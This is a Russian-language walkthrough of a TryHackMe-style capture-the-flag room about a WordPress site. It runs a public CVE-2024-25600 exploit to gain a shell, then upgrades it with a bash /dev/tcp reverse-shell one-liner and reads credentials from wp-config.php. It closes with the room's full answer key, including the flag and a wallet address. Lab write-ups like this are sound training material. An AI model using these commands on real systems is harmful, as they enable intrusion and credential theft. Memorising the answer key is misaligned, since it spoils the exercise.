Мой первый write-up, раньше писал заметки только для себя. Специально выбрал машину уровня Easy просто чтобы попробовать. Надеюсь будет полезно.
Не будем тратить время на описание, прыгнем с места в карьер.
Все ответы и флаги будут одним списком в самом конце.
Добавляем в /etc/hosts
10.10.34.203 bricks.thm - у вас будет свой ip адресВыполняем сканирование, флаг -A включает расширенное сканирование с определением ОС, версий сервисов, использованием скриптов и трассировку до ресурса
nmap -A 10.10.34.203
Видим следующие открытые порты
80 — http server
443 — на нем запущен Apache с WordPress 6.5
3306 — MySQL (нужна аутентификация)
/wp-admin/ в выводе снова намекает на wordpress
Начнем с WordPress Enumeration с помощью утилиты WPScan, она предназначена для поиска слабых мест в движке WordPress, его плагинах, темах и конфигурации
wpscan --url https://bricks.thmВидим ошибку и немного правим, опция disable-tls-checks полезна, когда у сайта самоподписанный сертификат
wpscan --url https://bricks.thm --disable-tls-checks
Смотрим вывод и после небольшого исследования понимаем, что можем что-то придумать с темой — ищем в гугле по типу wordpress bricks 1.9.5 exploit
По первой ссылке находим репозиторий, клонируем и запускаем
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
cd exploit folder
ls
python3 CVE-2024-25600.py -u https://bricks.thm/
получаем shell
ls
видим файл много_цифр.txt
cat много_цифр.txt
видим наш флаг
Теперь улучшим наш shell, в одном окне запустим с помощью nc listener на порту 5555, а в окне shell полученном ранее с помощью эксплойта, запустим one liner reverse shell, который подключится к указанному адресу и порту
в новом окне делаем
nc -lvnp 5555
в shell полученном с помощью эксплойта делаем
bash -c 'exec bash -i &>/dev/tcp/[здесь твой ip]/[здесь твой порт] <&1'На серьезных CTF нужно учиться подмечать все, до чего могут дотянуться наши шаловливые ручки. Например в директории с флагом мы видим wp-config.php и открыв его можем найти разные интересные данные, например DB_NAME, DB_PASSWORD и некоторые другие 🙂
Посмотрим список запущенных сервисов в системе
systemctl list-units -- type=service -- state=runningВнимательно просматриваем и видим намек. Это ответ на третий вопрос
Выведем содержимое найденного юнита
systemctl cat ubuntu.service
Это ответ на второй вопрос
Выше мы видим путь /lib/NetworkManager и скорее всего не просто так. Заглянем в него
cd /lib/NetworkManagerИзучаем директорию и находим файл inet.conf в выводе которого очень интересная информация. Похоже это оно.
Теперь найдем в нем wallet address, выведем первые 20 строк файла
head -n 20 inet.conf
Видим, что строка обфусцирована и применим CyberChef чтобы декодировать ее
https://gchq.github.io/CyberChef
Получаем 2 биткойн кошелька, теперь нужно понять какой из них настоящий, идем на сайт
https://www.blockchain.com/explorer
Видим что это он
Теперь ищем ответ на последний вопрос. Я ориентировался на крупные переводы и по одному из них нашел следующее
Гуглим, проходим по ссылке и видим, что речь шла о LockBit
Итоговый список ответов на вопросы
What is the content of the hidden .txt file in the web folder?
THM{fl46_650c844110baced87e1606453b93f22a}
What is the name of the suspicious process?
nm-inet-dialog
What is the service name affiliated with the suspicious process?
ubuntu.service
What is the log file name of the miner instance?
inet.conf
What is the wallet address of the miner instance?
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
The wallet address used has been involved in transactions between wallets belonging to which threat group?
LockBit
Надеюсь было полезно. Удачи на THM